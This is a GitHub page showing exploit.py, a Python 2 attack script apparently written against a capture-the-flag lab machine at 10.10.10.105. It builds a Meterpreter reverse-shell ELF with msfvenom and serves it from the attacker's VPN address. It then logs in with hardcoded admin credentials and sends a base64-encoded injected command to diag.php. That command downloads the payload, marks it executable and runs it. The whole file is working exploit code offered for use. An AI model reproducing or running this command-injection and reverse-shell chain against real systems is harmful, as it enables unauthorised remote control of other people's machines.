-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathexploit.py
executable file
·59 lines (52 loc) · 2.13 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/python
import requests
import netifaces as ni
import time
import random,string
import base64
import os,subprocess,sys
CPURP = '\033[95m'
CGREEN = '\033[92m'
CRED = '\033[91m'
CEND = '\033[0m'
def rce():
try:
ni.ifaddresses('tun0')
ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr']
port = 9191
except:
print '{}[*]{} Failed to retrieve tun0 IP address. Is your VPN on?'.format(CRED,CEND)
sys.exit()
print '{}[*]{} Generating ELF...'.format(CPURP,CEND)
filename = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(10))
FNULL = open(os.devnull, 'w')
subprocess.call('msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={} LPORT={} -f elf -o {}'.format(ip,port,filename), shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
try:
subprocess.Popen(["python -m SimpleHTTPServer 8000"], shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
print '{}[*]{} Started web server at http://{}:8000/'.format(CGREEN,CEND,ip)
except:
print '{}[*]{} Failed to start web server. Exiting...'.format(CRED,CEND)
sys.exit()
time.sleep(2)
with requests.Session() as s:
try:
print '{}[*]{} Executing the payload...'.format(CPURP,CEND)
r = s.post('http://10.10.10.105/', data={'username':'admin', 'password':'NET_45JDX23'})
cookie = {'PHPSESSID': requests.utils.dict_from_cookiejar(s.cookies)['PHPSESSID']}
cmd='a&wget http://{0}:8000/{1};chmod 777 {1};./{1};ls'.format(ip,filename)
payload = {'check':'{}'.format(base64.b64encode(cmd))}
s.post('http://10.10.10.105/diag.php',cookies=cookie,data=payload,timeout=5) # increase timeout if the box is busy
except requests.exceptions.Timeout:
print '{}[*]{} Payload sent. Please wait for a connection back'.format(CGREEN,CEND)
subprocess.call('rm {}'.format(filename), shell=True)
subprocess.call('pkill -f SimpleHTTPServer', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
except:
print '{}[*]{} Something went wrong. Reset the box!'.format(CRED,CEND)
pass
if __name__ == '__main__':
# Don't forget: msfconsole -qr msf.rc
try:
subprocess.call('pkill -f SimpleHTTPServer', shell=True)
except:
pass
rce()